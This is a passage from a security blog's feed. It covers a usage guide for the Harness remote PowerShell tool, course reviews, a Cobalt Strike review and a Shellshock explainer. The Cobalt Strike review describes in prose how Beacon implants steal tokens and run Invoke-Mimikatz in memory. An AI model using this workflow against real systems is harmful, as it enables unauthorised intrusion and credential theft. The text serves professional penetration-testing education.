<p><a href="/images/2015/10/harness_multiline_input.png"><img class="aligncenter size-full wp-image-359" src="/images/2015/10/harness_multiline_input.png" alt="harness_multiline_input" width="702" height="292" srcset="/images/2015/10/harness_multiline_input.png 702w, /images/2015/10/harness_multiline_input-300x125.png 300w" sizes="(max-width: 702px) 100vw, 702px" /></a></p>
<p>In the example below I have a typo that caused a parse error. Since I’m not able to complete the script the accumulator will never return out of the sub-prompt loop. Rather than kill the shell the <strong><em>^end</em></strong> command allows you to break out of the loop cleanly without terminating the shell.</p>
<p><a href="/images/2015/10/harness_end_command.png"><img class="aligncenter size-full wp-image-353" src="/images/2015/10/harness_end_command.png" alt="harness_end_command" width="846" height="135" srcset="/images/2015/10/harness_end_command.png 846w, /images/2015/10/harness_end_command-300x48.png 300w" sizes="(max-width: 846px) 100vw, 846px" /></a></p>
<h2 id="sleep">^sleep</h2>
<p>The <strong><em>^sleep</em></strong> command allows the user to suspend the shell and schedule a call back at a specified time. You may use a specific time or simply enter an offset from the current time. <em> NOTE: time is relative to the time on the target machine. This will be simplified by normalizing all time to UTC in future releases.</em></p>
<h3 id="usage-sleep-xdhms--ddmmyyyy-hhmm-">Usage: ^sleep [+Xd|h|m|s] | [dd/mm/yyyy hh:mm ]</h3>
<p><a href="/images/2015/10/harness_sleep.png"><img class="aligncenter size-full wp-image-363" src="/images/2015/10/harness_sleep.png" alt="harness_sleep" width="947" height="255" srcset="/images/2015/10/harness_sleep.png 947w, /images/2015/10/harness_sleep-300x81.png 300w" sizes="(max-width: 947px) 100vw, 947px" /></a></p>
<p> </p>
<h2 id="enable-format-and-disable-format">^enable-format and ^disable-format</h2>
<p>All commands sent to the Harness payload are piped to the Out-String cmdlet to format output. If for some reason you do not want this behavior you can disable this feature with the <strong><em>^disable-format</em></strong> command. Likewise <strong><em>^enable-format</em></strong> should be self-explanatory.</p>
<h3 id="usage-enable-format">Usage: ^enable-format</h3>
<h3 id="-------disable-format"> ^disable-format</h3>
<p><a href="/images/2015/10/harness_formating.png"><img class="aligncenter size-full wp-image-354" src="/images/2015/10/harness_formating.png" alt="harness_formating" width="983" height="472" srcset="/images/2015/10/harness_formating.png 983w, /images/2015/10/harness_formating-300x144.png 300w" sizes="(max-width: 983px) 100vw, 983px" /></a></p>
<p> </p>
<h1 id="conclusion">Conclusion</h1>
<p>Overall Harness is a fun project, and I learned a lot things along the way. I’ll be adding updates and features as time allows. This is just one more tool to add to your toolbox. Use what works best for the situation at hand.</p>
<p>Download Harness here: <a href="https://github.com/Rich5/Harness">https://github.com/Rich5/Harness</a></p>
<p> </p>
<p><a href="https://bytesdarkly.com/2015/10/harness-intro-and-usage-guide/">Harness: Intro and Usage Guide</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on October 04, 2015.</p>https://bytesdarkly.com/2015/07/accepted-to-speak-at-defcon-232015-07-03T15:49:11-05:002015-07-03T15:49:11-05:00Richhttps://bytesdarkly.com
<h5 id="i-will-have-the-honor-of-speaking-at-defcon-23-about-a-new-tool-set-ill-be-releasing-if-youre-planning-on-attending-defcon-this-year-my-talk-will-be-on-friday-7-aug--1600-hope-to-see-everyone-there">I will have the honor of speaking at DEFCON 23 about a new tool set I’ll be releasing. If you’re planning on attending DEFCON this year my talk will be on Friday, 7 Aug @ 1600. Hope to see everyone there.</h5>
<p><strong>Abstract:</strong></p>
<p>The Harness toolset aims to give penetration testers and red teams the ability to pull a remote powershell interface with all the same features of the native Powershell CLI and more. Several tools and utilities have been released to solve the powershell weaponization problem, but no freely available tool give operators the full capabilities of powershell through a remote interface. We’ll start the talk with a quick survey of the previous methods of weaponizing powershell, and then move into the capabilities of the Harness toolset which includes a fully interactive powershell CLI, and remote importing of modules across the wire without staging. We’ll conclude with taking a look at the underlying code that makes the toolset work, and briefly discuss planned features. The Harness toolset will be released open source in conjunction with this talk.</p>
<p>https://www.defcon.org/html/defcon-23/dc-23-speakers.html#Kelley</p>
<p><a href="https://bytesdarkly.com/2015/07/accepted-to-speak-at-defcon-23/">Accepted to speak at DEFCON 23!</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on July 03, 2015.</p>https://bytesdarkly.com/2015/01/ctposce-lessons-learned2015-01-20T08:05:52-05:002015-01-20T08:05:52-05:00Richhttps://bytesdarkly.com
<p style="text-align: center;">
<em>“We are happy to inform you that you have successfully completed the Cracking the Perimeter certification challenge and have obtained your Offensive Security Certified Expert (OSCE) certification.”</em>
</p>
<p style="text-align: left;">
I recently completed the Cracking the Perimeter course and exam to gain the Offensive Security Certified Expert (OSCE) certification; along the way I realized that I know less about information security than when I started. This may seem strange to some, but I think those that have been through the course know what I’m talking about. After passing the OSCP exam I felt more confident in my abilities as a penetration tester. After passing the OSCE exam I know that I have so much more to learn in the field of information security. The best way I can describe it is it’s like getting to the top of a mountain only to look around and see an entire mountain range before you. Similar to my post about my experience with <a href="http://bytesdarkly.com/2014/09/pwkoscp-lessons-learned/">PWK/OSCP</a> I will start with a review of the course and exam, and then try to end with some lessons I learned along the way.
</p>
<h2 id="course-overview">Course Overview</h2>
<h4 id="ctpcourse-material">CTP Course Material</h4>
<p style="text-align: left;">
The course material provided was professional and well put together which seems to be the standard for Offensive Security. The combined format of videos and written material works well for the way I learn, and the instruction makes it all look so very easy.
</p>
<h4 id="lab-environment">Lab Environment</h4>
<p style="text-align: left;">
I purchased 60 days of lab time which included the exam fee similar to the PWK course. The lab environment is not nearly as large because overall CTP is a very different experience. The techniques described in CTP were far more advanced than in the PWK course, and you’ll spend a lot time staring at a debugger. If this sounds scary to you don’t worry. If you have a real interest in the material then it’s possible to get through this course and exam. The course material covers non-trivial web exploits, AV evasion techniques, and some really interesting exploit case studies. What I liked most about the lab material is that many of the exercises did not work exactly like what was shown in the video or guide. I believe this is by design, and it’s a wonderful way to reinforce learning. Everything will work as shown up to a point, and then it’s up to you to figure out the “trick” to get an exploit working.
</p>
<h2 id="exam-experience">Exam Experience</h2>
<p style="text-align: left;">
First things first – I failed my first attempt at the OSCE exam. My hat is off to anyone that passed on the first try. I felt really confident with the exercises in the lab and getting around the debugger, but the OSCE exam was much harder than I thought it would be. It wasn’t unfair by any means. It just highlighted how much I did not know at the time. My major downfall was getting tunnel vision and spending far too much time on some of the problems. After my first attempt I set out to fill-in the gaps in my knowledge base. I have read several reviews that said that the CTP course material includes everything you need to pass the exam -well yes and no. Of course you have to use what you learned in the lab for the exam, but I did a lot of external research also. This is just my own experience so, as they say, results may vary. After about an additional month of preparing I started my second attempt. The exam was still challenging, but in the end I gained enough points to pass.
</p>
<h2 id="lessons-learned">Lessons Learned</h2>
<p>The main lesson I learned throughout this experience was that persistence is sometimes enough. If you want it bad enough you’ll make it happen. There were times when I was stuck on a problem and out of ideas, but just kept at it. Sometimes I was ready to smash my monitor because I didn’t think I was getting anywhere, and then I realized that over time I had made a lot of incremental progress towards a solution. I guess the lesson can be summed up with this – keep trying harder ( as frustrating as that may be).</p>
<p>One question that I keep getting is, “Do I need to know how to program/script/etc to pass the OSCE exam?”. My response is that you should be comfortable reading and writing code. You do not have to be a programmer or super script writer, but I would really suggest that you understand the basics before attempting the exam.</p>
<p style="text-align: left;">
</p>
<p><a href="https://bytesdarkly.com/2015/01/ctposce-lessons-learned/">CTP/OSCE: Lessons Learned</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on January 20, 2015.</p>https://bytesdarkly.com/2014/12/science-data-and-decisions2014-12-16T08:47:25-05:002014-12-16T08:47:25-05:00Richhttps://bytesdarkly.com
<p>There appears to be a serious communications problem between the general public and scientists. In short, scientists are generally bad at communicating their ideas to those of us that are not in their field. One only has to look as far as the <a href="http://en.wikipedia.org/wiki/MMR_vaccine_controversy">vaccine controversy</a> to see how bad this has become. The information security community suffers from this same problem. It’s not that there is a lack of smart or capable people out there. Is does appear, however, that there is a lack of smart and capable people that can communicate effectively. Instead of listening to experts we often turn to the media to translate scientific and technical findings into some sort of meaningful message. Unfortunately, the mainstream media likes to broadcast generalities, sound bites, and sensationalism in the name of ratings. Rather than inform ourselves and make our own decisions we are allowing anyone who talks the most and loudest to influence our lives. I’m not completely blaming the mainstream media though. The same is true for social media.We, the public, allowed this to happen, and the media caters to what they think the public wants. I’m the first to admit that I’m a news junkie, but part of being informed is researching the facts in order to draw your own conclusions. More than any other time in history, thanks to the Internet, nearly all the information we could want is at our fingertips so why do people continue to believe things that are counter to available evidence? My theory is that it’s a combination of laziness, ignorance, and information overload. It takes time and effort to do research and reading scientific papers is not something most people enjoy doing. The rest of this post outlines how I go about sifting through the enormous amount of data that is thrown at me everyday, and how I try to make sense of it all.</p>
<h2 id="vetting-information-sources">Vetting Information Sources</h2>
<p>The source of the data you receive is the most important factor to consider when processing new information. Some questions I always ask myself are:</p>
<h4 id="is-this-source-credible">“Is this source credible?”</h4>
<p>What are the author’s credentials? If the author’s bio shows that they are a doctor don’t just assume they are an expert. What’s their degree in? Do they have a Phd or MD? If the author is writing about medical procedures, but they have a Phd in communications, for example, you need to consider that when consuming their information. That does not mean you have to immediately dismiss what they are saying, but you should at least be a little skeptical if they are touting “medical facts”. A follow-up question to this one is,</p>
<h4 id="how-widely-cited-is-this-source">“How widely cited is this source?”</h4>
<p>In the scientific community, with peer-reviewed publications, it’s relatively easy to see how often an author or paper is cited by colleagues. Exactly how to check the amount of citations is beyond the scope of this post, but there are academic search engines and databases that can help with this. If a source has been widely cited go find out why. Is it because the information is nonsense and other scientist are debunking its conclusions or are they using it as a foundation for further research? On the other hand, when considering social media and mainstream news using the number of citations can be dangerous. It’s easy for sensational, but otherwise false or incomplete, information to spread very quickly. Instead ask yourself the other questions listed here, and try to establish a trusted source (more on that shortly).</p>
<h4 id="is-the-publicationcredible">“Is the publication credible?”</h4>
<p>Where are you getting your information? Whether it’s the morning news, a website, journal article, or Facebook post you have to weigh where information is coming from. There are pros and cons to every publication. Mainstream media tends to vet their sources more carefully than, say, the Facebook post by your friend who heard something from a friend of a friend. However, mainstream media tends to be influenced by the political leanings of the owners. One of the main reasons the MMR vaccine controversy was so widely accepted is that the originating article was published in one of the world’s oldest and best known general medical journals, _The Lancet. _Any publication can make a mistake so do not immediately assume credibility without going through your vetting process.</p>
<h4 id="do-they-citetheir-sources">“Do they cite their sources?”</h4>
<p>It’s rare that information is completely original and does not require cited sources. If the author is quoting “facts and figures” they should have a source cited; if they don’t have citations the skeptic flag should go up until you’re more sure about the data.</p>
<h4 id="is-the-author-pushing-an-agenda">“Is the author pushing an agenda?”</h4>
<p>Take into account the tone of the message. Biases and agendas will tell you how much credibility you should give to a particular source. A really hard thing to do is question a source that you agree with, and this is especially true for emotionally or politically charged issues. Take a step back and always question your assumptions before believing new information.</p>
<h4 id="is-this-one-of-my-trusted-sources"> “Is this one of my trusted sources?”</h4>
<p>With so much information out there it’s important to establish a list of your personal trusted sources. Trusted sources can be mainstream media outlets, blogs, twitter accounts, etc. The most important criteria for a trusted source is that you have <em>consistently</em> vetted their information output and integrity. The advantage of establishing trusted sources is that you can then allow them to feed you information by subscribing to their services or regularly consuming their information. I’m not saying that all the information from your trusted sources should be blindly accepted, but these should be sources that in general require less scrutiny. It’s up to you on determining the criteria for a trusted source, but choose wisely who you let influence your view of the world. I would recommend following two conflicting sources to get both sides of the story (e.g. Fox News and CNN).</p>
<p>By vetting your information sources you’re creating a filter that funnels more credible information down to you. This in turn allows you to form more educated opinions and make better decisions. Once you learn to vet your sources you can then start reading more into the actual facts. Many news stories start with something like, “according to a recent study”, or “according to a recent poll”, but most people will never go look up the actual conclusions of the original data. When you don’t take the time to go look up cited data what you’re saying is that you trust the author to interpret it correctly and report accurate conclusions to you. This is not a problem if you have previously vetted the source, but if you haven’t then it’s time to go dig a little deeper.</p>
<h2 id="reading-scientific-publications">Reading Scientific Publications</h2>
<p>Let’s be honest most scientific papers are less than exciting, and the general public doesn’t have the time nor inclination to read them. However, with a little effort you can quickly review scientific papers to get a general idea of what the authors are trying to present. Of course if you have the time I recommend reading documents in their entirety, but as a matter of practicality for most people you can just focus on the following sections of most scientific papers.</p>
<h4 id="abstract">Abstract</h4>
<p>When you search for scientific papers (<a href="http://scholar.google.com/">quick start here</a>) most often you’ll see the abstract section before any other part of the paper. If you can only read one section of a scientific paper it should be the abstract. The abstract summarizes the key points of the paper, and it’s usually in a single paragraph. Everyone can take the time to read a single paragraph. Scientists rely of other scientists reviewing their work so it’s important to tell their peers upfront, what they were investigating, how they conducted their experiments, any major findings, and their conclusions. These are exactly the points you need to know to make a more informed decision.</p>
<h4 id="introduction">Introduction</h4>
<p>If you have a little extra time after reading the abstract continue on to the introduction. Like the abstract this will give you an overview of the entire paper, but provide even more details.</p>
<h4 id="key-charts-andor-graphs">Key Charts and/or Graphs</h4>
<p>Skim over the paper for charts or graphs. By definition charts and graph should be able to stand alone to convey information, and these will usually contain key experimental findings.</p>
<h4 id="conclusion-or-summary">Conclusion or Summary</h4>
<p>After the abstract this is probably the most important part to read in scientific papers. The conclusion is the place where experts interpret data and draw on their experiences to develop meaningful results or call others to action. This is the part you want to know – what does the expert actually think?</p>
<p> </p>
<h2 id="closing">Closing</h2>
<p>I can’t guarantee that you will be able to understand every paper you read. Some subjects are so advanced that even the abstracts are daunting. It’s okay to not understand everything though. The important part is that by making the effort to inform yourself you are already better for it. At the very least you will understand that most news is far more complicated than the media lets on. I would like to conclude with a call to any scientists reading this – write for everyone, not just other scientists. Write papers for your peers, but also remember that the public needs to be informed by you and not the watered down interpretation of your work often presented.</p>
<p> </p>
<p><a href="https://bytesdarkly.com/2014/12/science-data-and-decisions/">Science, Data, and Decisions</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on December 16, 2014.</p>https://bytesdarkly.com/2014/11/cobalt-strike-review2014-11-12T06:56:04-05:002014-11-12T06:56:04-05:00Richhttps://bytesdarkly.com
<p> </p>
<p>On a recent engagement I was lucky enough to be able to use Cobalt Strike on a sustained multi-week operation, and overall I was impressed with it’s performance. This particular engagement was all about adversary emulation, and as far as I’m concerned Cobalt Strike is the premier tool for that type of job. While it’s fresh in my mind I just wanted to highlight some of Cobalt Strike’s features that made life easier on this particular assignment.</p>
<p>For those that have never heard of Cobalt Strike I highly suggest heading over to the <a href="http://www.cobaltstrike.com/">official website</a> and spending some time reading through all the information there. Cobalt Strike creator, Raphael Mudge, has compiled a blog with a wealth of information and I’m certainly not going to attempt to revisit everything here. From the official website, “Cobalt Strike is penetration testing software that executes targeted attacks and replicates advanced threats.” If you’re familiar with Armitage then at first glance you should recognize the Cobalt Strike interface, but there is a world of difference between the two products. In addition to providing a clean graphical interface to the Metasploit Framework, Cobalt Strike comes with it’s own advanced features including it’s own post exploitation tool called Beacon. Beacon was the primary tool I used during this engagement so that’s what I’ll be focusing on in this post.</p>
<h2 id="listeners">Listeners</h2>
<p>Cobalt Strike is really good at taking care of the routine tasks for you. Setting up listeners is as simple as a few clicks and then specifying a name, payload type, IP, and port. The real payoff comes later when you’re generating payloads and spawning sessions on various team servers; the way Cobalt Strike manages all this is an amazing time saver. More on that later.<figure id="attachment_239" style="width: 640px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/listeners.png"><img class="size-large wp-image-239" src="/images/2014/11/listeners-1024x567.png" alt="Adding and Editing Listeners" width="640" height="354" srcset="/images/2014/11/listeners-1024x567.png 1024w, /images/2014/11/listeners-300x166.png 300w, /images/2014/11/listeners.png 1173w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<h2 id="beacon-payloads">Beacon Payloads</h2>
<p>Beacon is Cobalt Strike’s asymmetric post exploitation tool, and for adversary emulation it is <strong><em>the</em></strong> tool to use. I’ll go so far as to say that Beacon is the most advanced post exploitation payload commercially available. You can generate a few different variations of Beacon payloads (e.g. exe, dropper, staged) that use different protocols namely http, https, and DNS. I used all three protocols during this job, and it was great to have so many options available, especially when combined with Cobalt Strike’s new Malleable C2 the variations on network signatures are endless.</p>
<p> <figure id="attachment_237" style="width: 640px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/create_beacon.png"><img class="size-large wp-image-237" src="/images/2014/11/create_beacon-1024x572.png" alt="Creating Beacon payloads" width="640" height="357" srcset="/images/2014/11/create_beacon-1024x572.png 1024w, /images/2014/11/create_beacon-300x167.png 300w, /images/2014/11/create_beacon.png 1171w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p> <figure id="attachment_248" style="width: 640px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/beacons-e1415804809673.png"><img class="size-large wp-image-248" src="/images/2014/11/beacons-e1415804809673-1024x266.png" alt="Beacon Call-back" width="640" height="166" srcset="/images/2014/11/beacons-e1415804809673-1024x266.png 1024w, /images/2014/11/beacons-e1415804809673-300x78.png 300w, /images/2014/11/beacons-e1415804809673.png 1169w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p> </p>
<p>Once implanted on a target, Beacon is able to covertly execute commands and other advanced payloads. It can tunnel Meterpreter sessions over it’s existing communication channel, inject into other processes, steal tokens, use golden tickets, and much more. However, the most useful Beacon feature I discovered was it’s ability to run Powershell scripts from memory. Running Powershell commands through Beacon is as simple as typing, powershell <cmd>. When I wanted to run an entire ps1 script it was as simple as typing, powershell-import <path to="" script="">, and then calling the newly imported function(s). I found that this new ability to run Powershell scripts over-the-wire changed my overall workflow. Some of my first post exploitation tasks soon became running PowerUp, Powerview, and Invoke-Mimikatz all through Beacon.</path></cmd></p>
<p> <figure id="attachment_241" style="width: 633px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/PowerUp2.png"><img class="wp-image-241" src="/images/2014/11/PowerUp2.png" alt="PowerUp2" width="633" height="279" srcset="/images/2014/11/PowerUp2.png 726w, /images/2014/11/PowerUp2-300x132.png 300w" sizes="(max-width: 633px) 100vw, 633px" /></a></p>
<p> </p>
<p> <figure id="attachment_242" style="width: 621px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/PowerUp3.png"><img class="size-full wp-image-242" src="/images/2014/11/PowerUp3.png" alt="PowerUp results" width="621" height="328" srcset="/images/2014/11/PowerUp3.png 621w, /images/2014/11/PowerUp3-300x158.png 300w" sizes="(max-width: 621px) 100vw, 621px" /></a></p>
<p> <figure id="attachment_238" style="width: 683px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/Invoke-Mimikatz.png"><img class=" wp-image-238" src="/images/2014/11/Invoke-Mimikatz.png" alt="Importing Invoke-Mimikatz.ps1 from Powersploit" width="683" height="251" srcset="/images/2014/11/Invoke-Mimikatz.png 876w, /images/2014/11/Invoke-Mimikatz-300x110.png 300w" sizes="(max-width: 683px) 100vw, 683px" /></a></p>
<p> </p>
<p>One last feature of Beacon I would like to highlight it’s ability to chain connections over SMB. Chaining is a great way to egress data through a single data channel rather than each Beacon calling out through the firewall, and it gave me granular control of my data flows that I didn’t easily have before.</p>
<p> <figure id="attachment_234" style="width: 635px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/Beacon_link.png"><img class="size-full wp-image-234" src="/images/2014/11/Beacon_link.png" alt="Beacon linking" width="635" height="322" srcset="/images/2014/11/Beacon_link.png 635w, /images/2014/11/Beacon_link-300x152.png 300w" sizes="(max-width: 635px) 100vw, 635px" /></a></p>
<p> </p>
<p>Much more information about Beacon can be found on the <a href="http://www.advancedpentest.com/help-beacon">Cobalt Strike blog.</a></p>
<p>More on using PowerUp and Powerview can be found on <a href="https://twitter.com/harmj0y">@HarmJ0y</a>‘s <a href="http://blog.harmj0y.net/">blog here</a></p>
<h2 id="team-servers">Team Servers</h2>
<p>Cobalt Strike supports the ability to connect to team servers to share sessions and other data which was especially useful during this engagement. There were instances where I lost access (whether by accident or on purpose :), and needed to regain a foothold on a target. Sometimes it would turn out that another team member had a Beacon deeply implanted calling back very low-and-slow to maintain a long-term persistence on the same target. Rather than take control of that Beacon I simply had to request that a session be passed over to my team server using the <em>spawn</em> command. From the Beacon interactive console you can type <em>spawn</em>, which will prompt you to specify a listener to call back to, and viola a new Beacon is on it’s way. What’s great is that you can spawn a session to any listener located on any team server to which you are connected. – very cool!</p>
<p> </p>
<p> <figure id="attachment_243" style="width: 560px" class="wp-caption aligncenter"></figure></p>
<p><a href="/images/2014/11/spawn.png"><img class="wp-image-243" src="/images/2014/11/spawn.png" alt="spawn" width="560" height="406" srcset="/images/2014/11/spawn.png 942w, /images/2014/11/spawn-300x217.png 300w" sizes="(max-width: 560px) 100vw, 560px" /></a></p>
<p> </p>
<h2 id="final-thoughts">Final Thoughts</h2>
<p>I still have a lot to learn about Cobalt Strike’s features, but overall it was an amazing tool to work with, and I’m sure I’ll be using it a lot in the future. I’ve been trying to think of any critiques I have, but after much consideration I realized that my only complaints are mostly that of a developer. That is to say I would have designed or layout some things differently, but I think that about pretty much every other piece of software that I didn’t write :). Go download the 21 day Cobalt Strike trial- it’s well worth checking out.</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p><a href="https://bytesdarkly.com/2014/11/cobalt-strike-review/">Cobalt Strike Review</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on November 12, 2014.</p>https://bytesdarkly.com/2014/09/sce-what-is-the-shell-shock-security-bug2014-09-26T05:25:42-05:002014-09-26T05:25:42-05:00Richhttps://bytesdarkly.com
<p><em>“Security Concepts Explained” (formally”Security for Grandma” (SFG)) is a semiregular series attempting to explain the technical details of popular security concepts in way that anyone can understand. My target audience is the regular folks out there so if you’re an experienced security professionals you may what to check out some of my other posts.</em></p>
<address>
</address>
<h2 id="the-shell-shock-security-bug">The Shell Shock Security Bug</h2>
<p>The security community is abuzz with a major security hole found in many popular computer systems across the world. In the media you’ll see it referred to as “shell shock” or “bash bug”, and if you believe the hype the world might be coming to an end. To be fair this is a serious problem for anyone that uses a device connected to the Internet, and if you’re still reading my little obscure blog post then that means you are more than a little concerned (or bored). As usual many articles referring to shell shock assume a lot from their readers, and do not always explain some of the terms used. If you don’t understand what a “shell” is or you’ve never heard of “bash” then you’ll probably just skip over most articles – so lets clear up a few terms.</p>
<h3 id="what-is-a-shell">What is a shell?</h3>
<p>When used in reference to a computer shell then what we’re talking about is the user interface. Unless someone has printed this post out and given it to you, you’re probably using some sort of shell to read it. However, not all shells are created equal. Some shells are Graphical User Interfaces (GUI) like most people are used to where you can use the mouse to click items thus commanding the computer to do something. On the other end of the spectrum are Command-line Interfaces (CLI) where you have to type out commands to get the computer to do something. I’m sure most of you have seen a command-line before, but for the sake of completion a very simple (and unrealistic) example is if you wanted type out a letter you might have to type the command, “open my letter” to open a word processor rather than simply clicking an image of a letter on a GUI. In short, a shell is just a way to tell the computer what to do and that’s it really.</p>
<p> <figure id="attachment_178" style="width: 402px" class="wp-caption alignnone"></figure></p>
<p><a href="/images/2014/09/winxppro.png"><img class=" wp-image-178" src="/images/2014/09/winxppro.png" alt="Windows Graphical User Interface is an example of a shell" width="402" height="301" srcset="/images/2014/09/winxppro.png 800w, /images/2014/09/winxppro-300x225.png 300w" sizes="(max-width: 402px) 100vw, 402px" /></a></p>
<p> <figure id="attachment_179" style="width: 407px" class="wp-caption alignnone"></figure></p>
<p><a href="/images/2014/09/xp_cli.png"><img class="wp-image-179" src="/images/2014/09/xp_cli.png" alt="xp_cli" width="407" height="206" srcset="/images/2014/09/xp_cli.png 675w, /images/2014/09/xp_cli-300x152.png 300w" sizes="(max-width: 407px) 100vw, 407px" /></a></p>
<p> </p>
<h3 id="what-is-bash">What is bash?</h3>
<p>You will also see “shell shock” referred to as the “bash bug”, and that’s because “bash” is the name of the shell where the vulnerability was found. Don’t get too hung up on the name though. It looks similar to the Windows command-line interface shown above, but usually found on computers running Linux and Unix operating systems. If you’ve only ever used a Windows computer with the familiar “Start button” in the bottom left corner then this may be a mystery to you, but in reality most of the Internet runs on computers that are not like the one you’re used to seeing. However, if you are a Apple Mac user running OS X then bash is on your computer.<figure id="attachment_186" style="width: 402px" class="wp-caption alignnone"></figure></p>
<p><a href="/images/2014/09/linux_cli.png"><img class=" wp-image-186" src="/images/2014/09/linux_cli.png" alt="Linux command-line shell" width="402" height="270" srcset="/images/2014/09/linux_cli.png 734w, /images/2014/09/linux_cli-300x201.png 300w" sizes="(max-width: 402px) 100vw, 402px" /></a></p>
<p> </p>
<h3 id="i-only-have-a-windows-computer-why-should-i-care-about-all-this">I only have a Windows computer. Why should I care about all this?</h3>
<p>Good question. The reason the average user should care is that the shell shock bug can be used to do evil things to websites that you visit. So even though you may only have a Windows computer at home, if you browse the Web then this bug could affect you. For example, if the bad guys can use shell shock to take control of your favorite news website then they can potentially break into your computer the next time you check the headlines. Don’t go throwing your computer away just yet though. Now that the problem is known IT professionals are quickly trying to plug the hole.</p>
<h3 id="how-does-shell-shock-work">How does shell shock work?</h3>
<p>Unfortunately, this bug is relatively easy to exploit, and there are already reports of bad guys using it to break into computers across the world. What shell shock allows attackers to do is take control of a computer by sending commands to it’s shell. They are able to do this because certain websites send commands to the shell to be able to function correctly. In a perfect world these commands would be filtered and checked first, but that doesn’t always happen. So what happens when a bad guy adds another “evil” command to a normal command? Using our above example instead of typing, “open my letter”, the bad guys can type, “open my letter” and “delete all files”. In this case the intended action was to just open a letter, but instead of stopping there and ignoring the rest of the line, as intended, the command “delete all files” was also run.</p>
<h3 id="time-to-panic"> Time to panic?</h3>
<p>As an average user there is no need to panic. For Mac and Linux users, make sure you update your computer to apply the latest fixes (if available). For Windows users, there is nothing to do for a change. You can rest assured that major companies are working hard to fix any of their systems that are affected; however, many other companies may not be as good about security so in the future I expect to see many stories of security breaches happening due to shell shock. As always been careful with the websites that you visit. If you’re really concerned then you can stick to major sites only for a while, but there’s no guarantee that any of us will be protected from the effects of this bug.</p>
<p><a href="https://bytesdarkly.com/2014/09/sce-what-is-the-shell-shock-security-bug/">SCE: What is the shell shock security bug?</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on September 26, 2014.</p>https://bytesdarkly.com/2014/09/pwkoscp-lessons-learned2014-09-19T06:17:25-05:002014-09-19T06:17:25-05:00Richhttps://bytesdarkly.com
<p style="text-align: center;">
<em>“We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification challenge </em><em>and have obtained your Offensive Security Certified Professional (OSCP) certification.”</em>
</p>
<p> </p>
<p>I recently completed the Penetration Testing with Kali (PWK) course and exam to gain the Offensive Security Certified Professional (OSCP) certification, and it was one of the most rewarding certifications that I’ve done. There have already been many reviews on the course, and instead of just reiterating what has <a href="http://www.offensive-security.com/testimonials-and-reviews/">been said before</a> I would like to add some lessons I learned while going through the PWK course, lab, and exam.</p>
<h2 id="my-background">My Background</h2>
<p>I like to think that I have a fairly strong technical background. My undergraduate studies were in computer science, and my masters degree focused on computational engineering. Additionally, I’ve previously completed a number of IT security certifications including CCNA-S, CPT, CEPT, and several others. I’ve worked as a network engineer, software engineer, penetration tester, developer, and managed technical teams. <em>I mention all these things because even with my previous education and experience I still found the OSCP exam challenging. </em></p>
<h2 id="course-overview">Course Overview</h2>
<h4 id="pwk-course-material">PWK Course Material</h4>
<p>The course material provided by Offensive Security was professional and well put together. There’s not much more I can say other than I consider the course material to be some of the best I’ve seen on the subject of penetration testing.</p>
<h4 id="lab-environment">Lab Environment</h4>
<p>When you sign up for the course you can purchase 30, 60, or 90 days worth of lab time (and add additional time as needed). My recommendation is to go through the course material as fast as possible, and maximize your time in the lab environment. You will have to research and learn beyond the course material to be successful on the exam. Offensive Security provides an excellent training environment to practice all the skills and techniques you will need. It’s well worth the money, and mastering the techniques you’re learning about is the only way you’ll get through the exam.</p>
<h2 id="exam-experience">Exam Experience</h2>
<p>After a little over 30 days of practicing on the lab environment I decided to challenge the exam. One of the things I like about the OSCP certification exam is that there is a relatively nominal fee to re-test if you fail it (at the time of this writing anyway). This aspect is much better than other certifications because I felt like the monetary risk was low- so why not give it a shot? On the day of the exam an email dropped in my inbox with specific instructions. I won’t say much about the details here. Basically, there are a number of boxes you have to compromise and capture a flag as _proof. _The last thing I’ll say about the exam format is that there are a number of restrictions about which tools and features you are allowed to use; these restrictions alone add another level of difficulty.</p>
<p>Overall, I spent about 17 hours on the exam out of the 23 hours 45 minutes allowed. For me there are diminishing returns as time goes on without sleep. Meaning that the more exhausted I got the longer it took me to recognize the little things I needed to be successful, and time is not on your side with the OSCP exam.</p>
<h2 id="lessons-learned">Lessons Learned</h2>
<ul>
<li><em><strong>Attention to Detail:</strong></em> Little things matter. Pay attention and be meticulous.</li>
<li><em><strong>Always check the simple things first:</strong></em> Don’t immediately assume that the obvious solution is the wrong one. Check defaults, try simple passwords, etc. which leads to my next point</li>
<li><em><strong>Stick to your methodology</strong></em>: Figure out what works for you and stick to it. Create your own or use established methods, but stick to your list of tasks. Don’t get in a hurry and jump to number 4 without trying tasks 1,2, and 3.</li>
<li><em><strong>If you think you’re missing something, you probably are:</strong></em> If at some point you’re stuck on a problem, and you know there is a solution, see my first three points</li>
<li><em><strong>Learn to conduct research:</strong></em> Learning to teach yourself is one of the most beneficial skills to have. Knowing where to look for information, how to interpret the data, and how to extract meaningful conclusions is necessary for this type of work.</li>
<li><em><strong>Don’t rely on tools:</strong></em> It’s ok to use tools, but know what they are doing behind the scenes. Tools break or just don’t work sometimes. Always have a backup method including the manual way.</li>
<li><em><strong>One hour practicing a technique is worth days of just reading about it</strong></em>: Practice is far more important that just knowing about something. Until you’ve gone through the motions you have no way of knowing your capabilities.</li>
</ul>
<p> </p>
<p>Again, if you’re seriously interested in penetration testing this is a must-do course in my opinion.</p>
<p> </p>
<p> </p>
